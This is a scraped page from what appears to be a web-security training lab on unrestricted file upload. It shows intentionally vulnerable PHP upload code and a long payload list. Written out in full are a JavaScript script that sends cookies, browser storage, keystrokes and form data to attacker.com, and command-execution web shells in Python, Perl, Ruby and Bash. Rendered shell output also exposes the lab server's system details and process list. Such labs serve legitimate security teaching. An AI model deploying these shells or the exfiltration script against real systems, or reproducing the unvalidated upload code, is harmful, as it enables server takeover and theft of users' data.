Lab 1: Basic File Upload

File upload without proper validation

Difficulty: Low

Lab Overview

This lab demonstrates a basic file upload vulnerability where users can upload files without proper validation. The application accepts any file type and stores it directly on the server without checking file content or extensions.

Objective: Upload malicious files to achieve server compromise or data exfiltration.

Vulnerable Code 
// Vulnerable: Basic file upload without validation
function process_file_upload($file) {
    if (empty($file['name'])) {
        return false;
    }
    
    // Vulnerable: Direct file upload without validation
    $upload_dir = 'uploads/';
    if (!file_exists($upload_dir)) {
        mkdir($upload_dir, 0755, true);
    }
    
    $file_path = $upload_dir . basename($file['name']);
    
    if (move_uploaded_file($file['tmp_name'], $file_path)) {
        return $file_path;
    }
    
    return false;
}
File Upload
⚠️ File Upload Warning

This lab demonstrates file upload vulnerabilities. You can upload:

  • PHP files (webshells)
  • Executable files
  • Script files
  • Any file type
File Upload Examples

Try uploading these files:

  • webshell.php - PHP web shell
  • malicious.js - JavaScript file
  • backdoor.exe - Executable file
  • config.txt - Configuration file
Uploaded Files

No files uploaded yet.

Vulnerability Details
  • Type: File Upload
  • Severity: High
  • Method: POST
  • Issue: No file validation or filtering
Test Files
  • webshell.php - PHP web shell
  • malicious.js - JavaScript file
  • backdoor.exe - Executable file
  • config.txt - Configuration file
File Upload Payloads

Use these files to test file upload vulnerabilities:

1. Basic PHP Web Shell (webshell.php):
2. Advanced PHP Web Shell (advanced_shell.php):
3. File Manager Web Shell (filemanager.php):
List Files
4. Database Web Shell (db_shell.php):
Error: SQLSTATE[28000] [1045] Access denied for user 'root'@'localhost' (using password: NO)
5. Reverse Shell (reverse_shell.php):
6. Data Exfiltration Shell (exfil_shell.php):
7. Keylogger Shell (keylogger.php):
View Keylog
8. File Upload Shell (upload_shell.php):
9. System Information Shell (info_shell.php):

System Information

PHP Version: 8.1.33

Server: LiteSpeed/6.3.4 Enterprise

OS: Linux v999.srv-console.green 5.14.0-570.55.1.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Oct 21 05:27:51 EDT 2025 x86_64

Current Directory: /home/kzlabsst/practice.kzlabs.store/fileupload

Disk Space: 232291524608 bytes free

Environment Variables

Process List
USER         PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
kzlabsst 2697789  0.0  0.0 150872 40768 ?        S    08:16   0:00 lsphp
kzlabsst 2768138  0.0  0.0 159400 32860 ?        Ss   08:21   0:00 lsphp:absst/practice.kzlabs.store/fileupload/1.php
kzlabsst 2768176  0.0  0.0   7236  3072 ?        R    08:21   0:00 ps aux



            
10. Network Scanner Shell (network_shell.php):

            

    
    
    



            
11. JavaScript Web Shell (webshell.js):

            
// JavaScript Web Shell
fetch('https://attacker.com/steal', {
    method: 'POST',
    headers: {'Content-Type': 'application/json'},
    body: JSON.stringify({
        cookie: document.cookie,
        localStorage: JSON.stringify(localStorage),
        sessionStorage: JSON.stringify(sessionStorage),
        userAgent: navigator.userAgent,
        url: window.location.href
    })
});

// Keylogger
document.addEventListener('keypress', function(e) {
    fetch('https://attacker.com/keys', {
        method: 'POST',
        body: 'key=' + e.key
    });
});

// Form hijacking
var forms = document.getElementsByTagName('form');
for (var i = 0; i < forms.length; i++) {
    forms[i].addEventListener('submit', function(e) {
        var data = new FormData(this);
        fetch('https://attacker.com/forms', {
            method: 'POST',
            body: data
        });
    });
}


            
12. Python Web Shell (webshell.py):

            
#!/usr/bin/env python3
import cgi
import subprocess
import os

print("Content-Type: text/html\n")

form = cgi.FieldStorage()
if 'cmd' in form:
    cmd = form['cmd'].value
    try:
        result = subprocess.run(cmd, shell=True, capture_output=True, text=True)
        print(f"
{result.stdout}
")
        if result.stderr:
            print(f"
Error: {result.stderr}
")
    except Exception as e:
        print(f"
Error: {e}
")

print("""


    
    


""")


            
13. Perl Web Shell (webshell.pl):

            
#!/usr/bin/perl
use CGI;
use strict;

my $cgi = new CGI;
print $cgi->header;

if ($cgi->param('cmd')) {
    my $cmd = $cgi->param('cmd');
    my $output = `$cmd 2>&1`;
    print "
$output
";
}

print <
    
    

HTML


            
14. Ruby Web Shell (webshell.rb):

            
#!/usr/bin/env ruby
require 'cgi'

cgi = CGI.new
puts cgi.header

if cgi['cmd'] && !cgi['cmd'].empty?
    cmd = cgi['cmd']
    output = `#{cmd} 2>&1`
    puts "
#{output}
"
end

puts <
    
    

HTML


            
15. Bash Web Shell (webshell.sh):

            
#!/bin/bash
echo "Content-Type: text/html"
echo ""

if [ "$REQUEST_METHOD" = "POST" ]; then
    read -r cmd
    echo "
"
    eval "$cmd" 2>&1
    echo "
"
fi

cat << 'EOF'


    
    


EOF

        


        

            
Real-World Attack Scenarios

            
        


        

            

                Mitigation Strategies
            

            

                
    
                    
  • Implement proper file type validation and whitelisting
    • 
                    
  • Use file content validation instead of relying on extensions
    • 
                    
  • Implement file size limits and upload quotas
    • 
                    
  • Store uploaded files outside web root directory
    • 
                    
  • Implement proper file permissions and access controls
    • 
                    
  • Regular security testing and vulnerability assessments
    • 
                    
  • Monitor for unusual file upload patterns
    • 
                    
  • Implement Content Security Policy (CSP)
    •